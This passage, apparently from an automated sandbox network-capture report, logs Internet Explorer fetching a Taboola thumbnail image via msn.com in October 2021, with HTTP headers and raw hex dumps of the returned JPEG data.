fc 81 fb e1 d2 ac 5c 22 b2 18 b4 4e a9 84 7a bb 6c 00 bf 53 b7 bb ef 7c 42 97 86 25 29 c5 f3 7c 46 5f 00 5e e7 7f 21 6f Data Ascii: /C\|EzA%O0`\|Ia-`Kz)s;\|K qUxn?c\|&1,8}9p%xM\|R0bd/%9+aa{Xk\|2-O-gzO8yrR80>_h~w]oa^:h_\"NzlS\|B%)\|F_^!o
2021-10-02 16:13:23 UTC	183	IN	Data Raw: 38 f2 d1 59 5c a7 c2 93 4c d9 4d ad 72 6d e2 9a e5 48 e4 67 5a 3f 66 6d 32 d7 2d 56 55 cd 57 62 5c d4 62 97 da 2e 14 84 4c eb 14 92 af a9 93 34 54 d0 8c 85 c6 6c 68 ef d5 1b 2b 61 4f ae a8 ec 44 d6 23 d2 9b a3 c1 8f 02 74 75 42 2c d3 dc 67 34 b6 f5 62 32 92 eb eb 96 97 e3 b9 36 3a c3 cb 9b 05 96 27 36 a5 cb aa 62 54 54 90 84 82 08 72 a2 d4 3d ef f9 ee a5 42 4a e6 49 96 6d 5d 53 65 2f ac 57 52 55 30 d5 25 28 9e 6d c1 00 00 3f 92 52 73 c2 33 14 2d c9 64 39 32 34 b8 d1 a1 52 5b 49 8d 19 b9 b2 6a 94 a6 e6 c5 06 3d 41 11 a6 b9 5e 62 a1 96 94 f3 ef 35 07 42 a1 36 98 a6 59 87 23 96 d2 92 cf 2f 2a 54 c1 2d 2c f8 14 00 a8 2c a3 a3 38 6f cf 21 16 a4 cd b2 61 9d 64 b4 7e de d3 2c e1 5c d9 22 d3 66 9a 85 54 a7 fe 79 36 95 59 82 69 9c bb 22 6a d4 60 d1 e0 fc 4b ec e7 Data Ascii: 8Y\LMrmHgZ?fm2-VUWb\b.L4Tlh+aOD#tuB,g4b26:'6bTTr=BJIm]Se/WRU0%(m?Rs3-d924R[Ij=A^b5B6Y#/*T-,,8o!ad~,\"fTy6Yi"j`K
2021-10-02 16:13:23 UTC	184	IN	Data Raw: af ad 03 c7 bf f0 cf b2 97 11 72 7f 06 38 f7 c2 b9 35 ac 8a ba 97 14 1b ca 4e 52 55 1e ad 0e 6d 1a 9c ed 0e 78 99 27 99 22 5c 39 33 9a 2c a5 12 62 35 22 92 a4 29 d6 1f 79 08 74 36 f1 18 d1 da b6 8a ef 5d e3 66 9b 2f 10 08 18 49 41 50 c4 da 16 d2 9c 5c 53 5a 78 46 d9 fe a3 36 32 f5 e9 27 60 f6 b6 cb 66 be a4 dd fb 3f fe a5 2e f1 42 a4 cc 95 36 74 ab 52 64 75 72 c0 96 50 89 81 4b 96 95 10 a0 53 8b 0b 82 d1 53 c0 ae c6 08 c8 75 5c d8 f6 64 cf 70 2b 0f e6 5c 99 57 ca 13 a9 79 5e 1c f8 70 e1 d3 33 1b 4e 46 aa 3a ba 8d 53 96 cb b2 59 62 38 4c 22 59 71 a6 5d 59 90 ea 3d 56 f1 83 7d 6d 04 ab 51 4a 6c a9 2c 99 98 80 20 96 25 b2 cd a8 f4 1b dd a3 53 d2 d7 ea 98 ed 3d 96 e5 1b 3b b2 e2 c1 22 c1 7f 59 af 4b 24 eb 74 c1 68 33 26 d8 ca 4c b5 19 08 ea d5 29 2a eb 02 88 Data Ascii: r85NRUmx'"\93,b5")yt6]f/IAP\SZxF62'`f?.B6tRdurPKSSu\dp+\Wy^p3NF:SYb8L"Yq]Y=V}mQJl, %S=;"YK$th3&L)*
2021-10-02 16:13:23 UTC	185	IN	Data Raw: 58 42 14 28 9c b4 cb de b9 c4 90 b5 17 35 34 1a 69 11 87 0b 7d 0d af e5 7e 9f e7 0c 9c 55 c5 dd 97 b4 46 05 6e f3 1f 78 05 ba 54 36 22 f7 bf 43 e7 e3 b6 1a 25 28 2f 51 4e 7f 68 64 b8 00 04 ee 77 b9 17 bf 7f 9d b1 0a 76 2d 9f 8c 2a 92 42 83 64 f9 6f e4 7c be d0 7c e4 f7 1f fe e4 90 7f 61 88 4e 26 ed 70 6c a2 70 2b 77 98 fb c3 87 89 fd 24 7b 40 ee f7 dc 60 04 28 7b 7f 46 16 04 9b 92 49 eb d4 f4 c3 00 d4 10 41 05 9b ea 07 7e 9d d8 52 90 79 ef 86 ed 24 6e 1c be 34 13 86 f6 37 06 dd 46 db f4 ee 1b f7 77 62 bc 4b c4 cf 4d cd 57 f9 f3 58 86 2a 24 e6 68 fe d1 16 b4 f8 5b c8 ea db e7 8b 0a 71 25 95 5d ff 00 38 7e 62 c0 66 00 c0 b0 ff 00 ed 85 ad bf 3b f9 03 a7 e3 d7 db be 24 00 32 84 21 46 a4 7a 7b 43 87 40 e9 6f 82 b1 05 21 59 87 88 c2 4e 4f e5 ef 48 80 a8 f8 9f Data Ascii: XB(54i}~UFnxT6"C%(/QNhdwv-Bdo\|\|aN&plp+w${@`({FIA~Ry$n47FwbKMWX$h[q%]8~bf;$2!Fz{C@o!YNOH
2021-10-02 16:13:23 UTC	186	IN	Data Raw: 1a 54 0d 68 f9 f2 ae 7c db 35 e9 2a 45 9a 49 91 25 7f e1 4a e6 aa 71 9e 52 a1 2d 25 6d 40 e1 4a 76 a1 c2 e0 39 d7 10 cb 96 7a 1a 5b 76 0c 97 a3 ad 31 e3 b1 26 5d 17 35 d3 5e 8e b4 34 a6 ea 8e b8 a9 f5 29 6e 2e 3b 48 69 b4 7a 42 51 29 e7 98 7e a0 16 d3 2e a5 25 ec b4 12 b1 80 92 14 9a 10 e4 31 6c aa 69 52 d5 39 98 c0 98 2c f3 24 20 5a 2c 8b 0a 9a b3 86 7c 99 08 54 a4 c8 04 e1 49 09 2e 32 fa 8f 69 b2 31 8d b3 31 87 a6 30 dc 19 f0 7f 3e a2 aa 04 e5 3f 0e ba cb 15 09 d0 e7 22 a7 97 9e 35 15 49 a4 ad fa 64 58 4c 26 14 a7 6e 1b 7d c9 0d 31 05 8b b4 b7 da 55 2a c7 2c b2 54 09 15 25 92 55 52 58 1c 40 fc 05 8e fc f4 13 67 91 22 74 de a6 cf 2d 2a 5c b9 12 c2 ad 32 01 94 30 b4 e6 44 c4 ba aa 71 38 20 05 6f 63 14 bf 99 b9 25 51 dc 4d 5a 2c 78 8d 2a 45 3a ad 43 56 60 Data Ascii: Th\|5EI%JqR-%m@Jv9z[v1&]5^4)n.;HizBQ)~.%1liR9,$ Z,\|TI.2i110>?"5IdXL&n}1U,T%URX@g"t-\20Dq8 oc%QMZ,xE:CV`
2021-10-02 16:13:23 UTC	188	IN	Data Raw: fd f7 db c7 bf 16 05 28 e4 78 e4 20 54 b0 53 da 1a e5 f9 1e 90 1c f3 e2 3e 23 e9 88 24 90 41 d7 30 cd 02 40 70 06 4f 0f cf 57 dd be 98 69 65 22 9e e7 bb c0 e9 17 60 4e ef 58 6f 48 dc fa bb 9e bf ab f6 b6 14 a8 aa 9e 51 8e 12 91 90 f3 3a f7 c3 fa 46 e7 a0 d8 6c 6d d7 bf ec f4 c2 b3 1e 3f 34 ca 0c 00 9c 9c 9e 70 de 91 e6 3e 23 e9 89 72 ef af 74 31 43 02 19 81 ef af c1 94 2f 4b 6c f4 2b 3e ef ff 00 d7 16 26 61 fa 49 a1 e5 14 a6 58 c4 49 49 7d ee 7e 7b 34 2f 49 be c2 de d3 b1 f9 8b 62 70 a4 d5 b3 af 38 b8 52 82 1f 9c 6d 7e a3 da 3f 81 7f 86 21 90 0f 1e 67 e7 8c 52 b9 72 89 72 3b 5a 31 3a 54 38 10 26 52 48 b1 d3 6f 69 c4 a9 f4 f6 f7 f6 89 96 92 ec 39 7c 77 fe b7 44 25 ff 00 58 69 3b 79 1d fe 23 f9 eb f3 c5 68 49 7e d5 77 ee 7d c0 fe 74 8c 89 80 02 90 9a 64 4e Data Ascii: (x TS>#$A0@pOWie"`NXoHQ:Flm?4p>#rt1C/Kl+>&aIXII}~{4/Ibp8Rm~?!gRrr;Z1:T8&RHoi9\|wD%Xi;y#hI~w}tdN
2021-10-02 16:13:23 UTC	189	IN	Data Raw: 9a 72 4b 15 64 a4 80 af 58 c0 55 b7 f5 55 a4 db d0 6e fe 91 f6 46 de 53 2e 5d ad 56 69 a5 81 97 69 0a 4a 54 a2 f5 4a 90 30 80 35 c7 87 74 79 d5 e3 d1 76 d7 59 17 35 62 cc bb 6c b5 24 1c 72 0a 41 4e 0a 02 17 f5 a9 c6 80 33 67 1a 8b 54 a7 e6 9c 9d 3b d1 aa f4 dc cd 93 6b 90 c1 6f 97 50 89 50 cb f3 99 28 48 69 51 94 e4 96 58 7d 69 d0 a0 08 52 fd 6b fa d7 0a 20 f6 92 2d 52 ed f2 d2 ab 3d a2 cf 69 92 e1 7d 5c b9 b6 7c 40 10 46 25 24 2b 13 68 5c 6b be 38 5b ca e8 b5 49 52 ec f7 9d 81 61 b0 24 cb b5 d9 16 b9 29 c2 0a 54 b1 89 18 17 35 4e 0d 72 03 53 19 ef 0f 3b 43 71 b3 85 d9 95 19 bb 87 dc 58 cf 59 57 32 3d 4e 95 47 91 59 a2 d7 27 bb 2e 45 22 50 52 a5 c2 95 1d e7 a5 33 2e 23 80 a9 32 63 b8 d2 9b 74 38 f1 5a 56 1e 50 24 eb 0d 81 78 44 fb 32 56 ee 14 84 07 5a b5 Data Ascii: rKdXUUnFS.]ViiJTJ05tyvY5bl$rAN3gT;koPP(HiQX}iRk -R=i}\\|@F%$+h\k8[IRa$)T5NrS;CqXYW2=NGY'.E"PR3.#2ct8ZVP$xD2VZ
2021-10-02 16:13:23 UTC	190	IN	Data Raw: 66 e5 ba 35 52 6e 62 66 17 26 a8 a8 ea 8d 0a 15 2a 62 26 4d 6c 3b 1e 34 c8 e8 69 e7 b9 cf 25 c4 08 13 08 ec c9 98 5c b3 e1 2c e1 df 76 e3 ae 71 83 60 b8 76 90 d9 2d 32 cd c3 7b 94 d9 2c 92 ed d3 4f ed 6d 18 84 8b 5a 90 8b 22 90 9e aa b8 d5 36 59 20 17 21 40 a6 b9 eb de 63 ce fc 3e a3 36 8c d7 59 cf 3c 3e a3 50 1c 8f 4d 98 c5 4a 75 56 8e 25 36 c6 66 aa c7 81 42 9a e4 76 66 3e a2 dd 42 91 02 a5 38 05 c5 59 72 0b 4c cb 61 29 65 82 e3 97 0b 2d b2 79 4a 64 c9 51 7d 14 0b 31 fa 4b 82 cd 47 7c b3 dc 63 d0 2e 7d 84 db 5b 7a 05 cb 64 d9 6d a1 b4 5e 2a c6 a4 cb 36 4b 44 b9 08 99 22 56 29 a8 5a a6 c9 48 01 2b 9b 20 8c 2a 70 42 82 9d 44 36 af e7 6e de 5c 07 cb 14 e5 37 43 7a 76 7f a9 18 d9 b7 d1 22 53 a3 3a cc 06 2a 70 2b 4b 8f 96 15 3e 6c b4 b2 c2 e9 d5 08 ad 2a a1 Data Ascii: f5Rnbf&b&Ml;4i%\,vq`v-2{,OmZ"6Y !@c>6Y<>PMJuV%6fBvf>B8YrLa)e-yJdQ}1KG\|c.}[zdm^6KD"V)ZH+ pBD6n\7Czv"S:p+K>l*
2021-10-02 16:13:23 UTC	191	IN	Data Raw: f5 f2 8a d4 09 0c 22 34 a8 a7 72 01 16 ff 00 6d ef e5 d7 16 44 89 4c c4 a9 27 56 af 75 1b be 1d 4a 24 93 72 13 ff 00 12 3b 80 df c7 bf 0c 9f a8 3c 5b 82 81 40 d0 e8 73 60 e0 93 e1 01 ad 3e 67 ef cf 19 47 08 48 e3 91 fb c5 70 c1 c4 f4 eb f0 38 c6 52 08 ca a3 83 bc 10 8a d3 63 71 b7 7d ed f5 c2 80 41 04 82 c0 8d 21 57 44 93 f3 38 64 ad 03 f4 83 6f 2b 75 f3 df af d9 ee c3 29 40 e4 2b ed 10 82 e2 af 4d f0 5a c7 9f 9f 4f ae 25 6a 4a b2 04 78 37 1d 72 87 84 56 00 bd f7 f3 fb fe 71 5c 10 5d 53 dd 72 0f 4e 98 20 80 1e a7 5e ff 00 0d fa 7f 9c 29 04 90 43 03 ae 8f 96 70 42 e6 27 dd e3 b7 df cf 16 94 10 9c 54 35 66 19 f9 b4 10 fc c4 f9 fc be b8 a1 40 92 e0 69 c3 ef 04 31 5a 3b fe 76 fa e1 92 ec c7 ee f0 1a 6f f0 86 0e a4 ec 02 be 03 eb 86 8b 0c b4 24 3f a3 7d a0 b5 Data Ascii: "4rmDL'VuJ$r;<[@s`>gGHp8Rcq}A!WD8do+u)@+MZO%jJx7rVq\]SrN ^)CpB'T5f@i1Z;vo$?}
2021-10-02 16:13:23 UTC	193	IN	Data Raw: dd e5 70 dc 7c 0b 6d ea 9b 1b 0d 93 61 8e 96 cb b5 db 31 6a 40 fd bd eb d5 3d 70 af fc 67 10 67 a4 c0 9c fc 0f 18 e7 2f 0e 8d f6 b6 c8 93 36 75 c6 a9 c9 19 4d 97 32 53 a4 0d 02 25 cd 53 e1 02 8d 53 1e 55 3a 8d 58 a5 3a 1b a8 52 aa 90 5e 6f d5 4b 52 e0 4b 8d ca 28 2a b8 1c e6 92 34 85 03 ab 52 48 df cb 1b 69 76 db 04 e6 54 9b cd 33 46 e0 b4 12 41 c8 67 f1 ea 23 93 9d 75 5e 92 03 da 2e fb 42 66 20 b0 79 33 70 00 e5 f1 32 48 51 a0 c3 9e 74 8b 39 92 42 d4 b5 85 17 4a 48 24 df fd e2 c4 06 ed a6 c6 fd 76 de c0 63 2d 44 2c 33 cb 5a 33 c4 4a 0f 2a 07 2e 39 68 ee cf 14 e1 c2 9c 2a 94 bc 44 7f 90 4c 96 a4 38 6f a5 24 a3 26 21 cd 0d 28 ed 17 08 f9 8a ad 0f d1 da 8b 57 aa c7 44 44 b8 86 0b 13 1f 6d 6c 21 e6 dd 4b 8d 34 03 c9 6d a6 8f a4 48 51 4a 5b 45 cb ce 6a 24 a8 Data Ascii: p\|ma1j@=pgg/6uM2S%SSU:X:R^oKRK(4RHivT3FAg#u^.Bf y3p2HQt9BJH$vc-D,3Z3J.9h*DL8o$&!(WDDml!K4mHQJ[Ej$
2021-10-02 16:13:23 UTC	194	IN	Data Raw: 38 94 12 93 5e 3c c8 f0 1c 20 c0 78 79 fd a1 cb d6 49 3a b6 06 da 7b be 64 62 cc 63 71 89 ea c9 15 50 1c 2a 7d a0 3d 20 79 7c bf fe ac 55 07 56 c4 54 11 c8 f8 56 17 a4 0f 2f 97 ff 00 d5 89 72 32 26 19 61 d8 0c dc e7 cb 7f ad 37 44 a8 96 8b 69 d4 2e 76 b7 df 85 bc 7d f6 38 b5 55 41 3c bc e1 c2 08 43 b8 a7 3d 4f 77 7c 1f a4 77 6a b0 3e 16 b7 cf 7c 52 ed 5d d0 9d ad 70 f9 c0 29 f0 a3 61 6d bb cf 43 7f 0d fc b7 f7 62 b1 30 6e 23 c3 ef 10 a4 92 5c 36 50 05 db 78 1f 67 f9 c5 82 b5 86 60 c0 66 c0 66 3f b8 f4 11 20 8e 84 7c 09 1e ef ed 8c b9 6a 2a 42 ab da 0c c3 4c eb 9f 06 d6 29 7c 24 6f f9 f7 82 2f 2e c7 a6 e3 c3 c7 f6 c0 ca 07 11 19 57 31 a4 04 93 9c 44 56 7f dd b7 87 43 fb 0f df 14 cd 98 b5 54 25 ab bc 7d fc 77 c4 41 a5 d7 3d d6 da e6 fe cd bd 9e 38 94 90 47 Data Ascii: 8^< xyI:{dbcqP}= y\|UVTV/r2&a7Di.v}8UA<C=Ow\|wj>\|R]p)amCb0n#\6Pxg`ff? \|jBL)\|$o/.W1DVCT%}wA=8G
2021-10-02 16:13:23 UTC	195	IN	Data Raw: f2 3e b5 2d 32 c8 03 a5 72 52 9a 30 c2 84 e2 df 56 39 f1 e2 32 8c 5e b1 93 b2 9c ee 70 73 2e d2 de 6c a1 49 2e c8 87 19 4a 4e a2 37 e5 f2 b4 b8 49 22 ea 56 e0 6c 0e fb 58 99 e8 5b 2c cb 98 99 a0 b1 50 58 c8 1a 64 43 b6 94 ee ac 62 2a c4 87 20 85 e1 a1 aa 98 7f fb 0b d3 5c c3 ee 8f 16 ac 70 0b 84 59 85 a7 dc ac e4 bc bf 38 30 e3 a3 97 e8 31 1e 69 96 89 59 51 dd 03 a2 46 b5 9b 58 6a 03 fd b8 ca 45 e5 3e 51 ec 5a 67 8d c2 5a d5 42 0f 3e 2c 3b eb 94 6b 2d 57 44 9b 40 29 32 d2 90 1f eb 95 2d 58 9e b4 d4 b5 1d c0 e0 e7 2f 15 af 76 17 ec cd 5d 25 4b e1 f5 11 b5 af 4b ec 98 b0 e3 b6 3d 1b 48 75 c7 09 42 48 24 a4 fa 9d 52 94 a8 63 3e 5e d4 5e f2 5c 0b 7d b1 29 ad 52 b2 4f 2a a9 88 f0 d0 35 23 4d ff 00 0a dd 44 e2 99 64 91 34 ee 55 9e 5a 85 4e 6c 75 6f b6 e7 c0 26 Data Ascii: >-2rR0V92^ps.lI.JN7I"VlX[,PXdCb* \pY801iYQFXjE>QZgZB>,;k-WD@)2-X/v]%KK=HuBH$Rc>^^\})RO*5#MDd4UZNluo&
2021-10-02 16:13:23 UTC	197	IN	Data Raw: bd a1 71 02 59 eb 0d e9 4a ff 00 ea 27 6f 31 f5 c5 6b 43 7d 15 f2 f5 31 30 e9 92 ab ee e5 fc 81 4e 20 09 8c 01 dc 35 1e d0 47 ff d9 Data Ascii: qYJ'o1kC}10N 5G

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49826	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:13:23 UTC	47	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-02 16:13:23 UTC	59	IN	HTTP/1.1 200 OK Connection: close Content-Length: 10756 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 623105471311786779303628346285156873834,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "530961f46738bb75e8a8c20ef3ac7b8b" expiration: expiry-date="Sat, 02 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Wed, 01 Sep 2021 04:44:02 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 18 X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb102 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Sat, 02 Oct 2021 16:13:23 GMT Age: 2264870 X-Served-By: cache-wdc5544-WDC, cache-dca17755-DCA, cache-mxp6968-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 1, 1 X-Timer: S1633191204.826937,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg X-vcl-time-ms: 1
2021-10-02 16:13:23 UTC	64	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72 Data Ascii: JFIF@ICC_PROFILE0ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
2021-10-02 16:13:23 UTC	67	IN	Data Raw: 63 85 3a b6 30 b5 9d 0f 38 d2 7b 38 c3 84 66 5d e9 e5 1c e2 8a c2 2a 46 57 4d 8a f8 eb 5e 54 a2 67 8b 3a 65 6f be 6c 49 67 b8 ad 4d 52 00 76 8d 00 54 b5 2a 2c c8 47 f1 b9 17 8e b2 69 f7 fc ef 41 74 c0 c2 bc 7d 39 96 bb 9c b7 fb 1e 4d d1 a6 40 bc d7 65 f4 97 2b 2e cb 37 da 2e 62 95 cc da b9 79 81 f5 6a 60 a0 bb 59 e3 25 8a 94 e0 20 38 41 e6 55 24 98 ca 19 96 80 3c 93 6e b2 0b 60 e6 db aa 93 4f 35 97 b3 83 13 be 35 42 6b 79 15 a7 fa 0d 4b 93 23 b9 a0 3a c6 c2 54 eb 48 66 a4 32 6d af bb e5 7a 30 67 12 9d 9d bb d1 b4 54 83 62 10 ca 9a ce 86 a4 e7 20 10 d9 1a 13 4f 67 64 94 5a d1 25 b8 65 fa 3a ae b0 67 3f 60 20 d1 45 96 a5 44 26 68 d9 71 9b 47 fe 03 b2 3a d7 c5 1c 9a a2 74 7d 6e 1e 88 f0 cd 87 27 5a 68 c4 d6 aa fa de 79 4d 17 32 da a0 88 3f 8c e6 e6 80 79 34 Data Ascii: c:08{8f]FWM^Tg:eolIgMRvT,GiAt}9M@e+.7.byj`Y% 8AU$<n`O55BkyK#:THf2mz0gTb OgdZ%e:g?` ED&hqG:t}n'ZhyM2?y4
2021-10-02 16:13:23 UTC	69	IN	Data Raw: 33 77 a3 fc 34 84 a9 19 aa 91 b8 9a 33 95 24 1e d7 fa 9c 94 7d b9 74 7d c7 26 19 70 7c e4 e3 ee 38 e3 2d 2e 15 f7 80 60 19 c6 01 c9 cd ec 82 49 b8 ed ea 18 bb 2e 45 2a 9d 4b a4 a8 63 e6 2b b1 c3 1b f7 b2 ac d3 a8 48 55 bc f2 56 a8 e8 cd 4a c4 8e ca b2 08 27 1f bb 18 af 68 0c 35 8d db 60 8c 8f b8 4a 30 7c 7f 43 8e 3d 1c bc 3d e4 c3 2e 0f 9c 9c 7d c7 1c 65 91 f3 8c 3d e0 c1 9c e7 39 bb 3d 9b 17 8c 1d f0 56 85 06 50 b0 50 a8 ca d7 f5 35 e1 91 ed 59 d2 f5 34 16 15 7c 51 cc 14 d1 05 56 eb 9e c0 50 c9 53 a9 64 98 fd 3d bf 1e de 8a a1 b5 95 1c 2d 94 3d b0 77 9b 08 ac bf d0 e3 0f 59 7d 72 61 97 47 ce 58 fd d8 e3 2c 0f 59 27 a3 9c e7 76 77 61 7c ea 37 8e 1d b5 72 e3 78 d1 49 49 64 47 af cf 9b 9e 20 4e 96 d5 d7 8e 6d 81 88 56 b8 51 a0 ad d3 fb 6b b5 b7 f7 f5 57 25 Data Ascii: 3w43$}t}&p\|8-.`I.E*Kc+HUVJ'h5`J0\|C==.}e=9=VPP5Y4\|QVPSd=-=wY}raGX,Y'vwa\|7rxIIdG NmVQkW%
2021-10-02 16:13:23 UTC	70	IN	Data Raw: 1f 6a 99 1f 38 0c 78 39 54 92 f7 3b b3 68 ef 5b 5e 5e 21 aa a3 1e ba 95 7a aa 7a 9b 50 9b 8a b0 41 d8 db 03 af eb 7a 7b c7 8e 95 5a 96 ac 3b a8 93 53 1a 5b 91 dc 45 59 d1 0a 65 dd 4d 81 3b 78 6b 49 ad d9 5c 88 c5 18 e9 ba 17 f4 35 f6 37 f5 15 f5 9b fd 4e dd bc 30 4d 3c 12 af 1d d1 75 25 0b 97 fa 63 71 56 b2 de b1 1e a3 a5 20 ab 50 6e ea ae 83 a2 d3 5e 99 2d 51 3e fb a2 a9 15 d9 dd 45 da 35 c9 53 57 59 f5 3a d5 16 4a 3b ca 4b 73 b1 b0 7a 79 12 c0 4e da 96 22 49 10 08 51 40 ec 11 10 d1 a9 e6 36 fb 01 39 0c a2 51 91 32 a9 93 85 54 37 36 2d 3c 8b 1d c2 9b d9 2b e5 e2 3e af 54 83 25 d6 c1 6f ab f4 74 a4 4e 9a e6 7d 15 19 4e 54 ed d8 53 11 ca 2b c8 a2 46 86 5c 29 fc 65 b3 32 d7 99 63 cf f8 fe f4 56 f4 d3 6a 9b 37 94 75 db 4d 55 9a fb 1a bd 2f d2 ee 95 e6 9a 5d Data Ascii: j8x9T;h[^^!zzPAz{Z;S[EYeM;xkI\57N0M<u%cqV Pn^-Q>E5SWY:J;KszyN"IQ@69Q2T76-<+>T%otN}NTS+F\)e2cVj7uMU/]
2021-10-02 16:13:23 UTC	74	IN	Data Raw: 04 cf 0a ea 65 b2 9c fb 31 4f 13 10 39 86 08 e4 03 d4 75 82 7c 08 d3 93 c7 1b ae 92 ad bd b1 5e 69 55 ff 00 e3 9d 7a 2f da 25 e8 75 0e 0a 91 d0 ed df c9 7d 0e b6 5d 6c 12 d7 7c dd eb 0e c6 99 ac c9 a1 d7 da d0 d7 82 a9 82 57 00 72 a3 cc 63 ea 9d 6c dc db 7f 25 49 83 2d 34 58 c8 07 35 37 e3 a8 92 c2 d8 d1 c5 3c be c6 a6 b4 63 8c 9e 01 e3 f4 3c 6b f9 c9 97 c6 a4 82 9e 2b 70 3c 33 a6 df a5 df 4d 34 af 41 2a d0 8a f5 62 b5 ae c7 a4 b9 f5 9d b2 c7 b9 86 ce bb 6d b1 a1 23 69 d2 49 a7 1d c6 85 74 58 c7 af 1a 7f 0b 1a 83 f1 19 e3 f0 cc 48 f8 11 f7 9f 84 ac bf c3 57 4e 3e 0c 09 86 04 23 8e 36 4f f4 80 b7 17 6c 83 3e aa 74 8a 7b 1e a4 45 65 af e5 98 7a 4a c8 f1 a9 c8 a2 ed 90 9c d6 48 e9 28 c7 98 18 f2 47 1c e5 d9 78 4e 03 52 90 01 ef 2e b2 4c bc 1c 4a eb 1c 91 cf Data Ascii: e1O9u\|^iUz/%u}]l\|Wrcl%I-4X57<c<k+p<3M4A*bm#iItXHWN>#6Ol>t{EezJH(GxNR.LJ
2021-10-02 16:13:23 UTC	78	IN	Data Raw: 43 5c 8a 9a cd a5 b1 49 77 4c 4d d8 92 30 22 ed 1b 0a ab 44 a6 a4 42 56 3d 48 2d d8 9c 64 cf 82 8e c8 dc c5 98 8a 3a 12 6b d9 d3 d3 bc 95 d0 ba 7a 6d 6c 8a bd 1c 5f 02 e8 ed c1 52 8c 60 27 14 29 c4 ce 26 68 71 4f 9e e8 84 9a 23 56 7e 4f 52 7e 4f 52 7e 4a b3 93 7a b1 b6 5d 97 7e 4b 99 3f 27 ff c4 00 2b 11 00 02 02 01 03 03 03 04 02 03 01 00 00 00 00 00 01 02 00 11 03 12 21 31 10 41 51 04 20 71 22 32 61 81 13 14 05 23 72 91 ff da 00 08 01 02 01 01 3f 00 97 d2 e5 cb e9 46 54 da 31 80 c1 2e 5c b9 72 fa 17 d3 35 cd 46 59 8c 77 82 2f 4b f6 b7 31 2b bc ff 00 5f e6 31 4e d7 0e e6 08 be dd 26 ae 3e 45 58 d9 e6 3c 8a df 3e d5 97 d4 6e 63 9d a3 ee 66 91 38 31 0d 80 7d 8b ec 5e 63 0b 58 d8 d8 6e 14 d7 9e 85 07 21 81 98 be d0 3f 3e c5 f6 2f 31 8e 95 b9 90 ae f6 cc 5b Data Ascii: C\IwLM0"DBV=H-d:kzml_R`')&hqO#V~OR~OR~Jz]~K?'+!1AQ q"2a#r?FT1.\r5FYw/K1+_1N&>EX<>ncf81}^cXn!?>/1[
2021-10-02 16:13:23 UTC	79	IN	Data Raw: 57 7e 1d 8c 2b 51 6c a3 11 43 ec ea 1b 6d 7d c5 e5 7a 8f 65 28 ee dc 44 73 da d0 9a 35 16 cd 6d 2d d1 87 88 32 f5 f0 dc 2c df ee 21 f8 5c 79 cd 02 88 b4 a9 39 ff 00 4d 51 86 95 17 ce 14 7b 5c 74 33 51 1b d0 99 50 eb cc 9f 74 c3 ee a7 7a 37 45 d4 89 52 df 90 c7 34 c9 2b 4a e2 d6 59 c5 4d 85 e6 ae 96 36 84 a2 30 a4 be 0b 48 58 fe 8d 29 02 1b 45 de fe 32 bb d5 1a 15 f8 88 f2 09 2b 5d 86 a2 db 79 de 14 65 53 4d fc be 21 00 17 50 49 ea c4 01 2e 87 e0 71 a3 53 6e 4c b3 3d 6c 23 05 5a 9b 67 43 aa b8 81 29 1d 95 12 ef 2b 56 21 7e 27 aa 47 f8 ca 88 1b 5b 67 26 2b d8 68 0c ee ea b8 25 4a b5 c6 91 2a d0 61 f1 27 2f 31 ee 80 06 e4 9b 01 33 7e 5d 61 a6 cc a4 07 3a 91 7e 60 4a b5 2b 77 a0 d4 cf f5 8e 62 2e 60 db 81 b8 83 32 90 c3 c4 4e 56 61 d4 4c eb 45 c3 15 e7 61 bc Data Ascii: 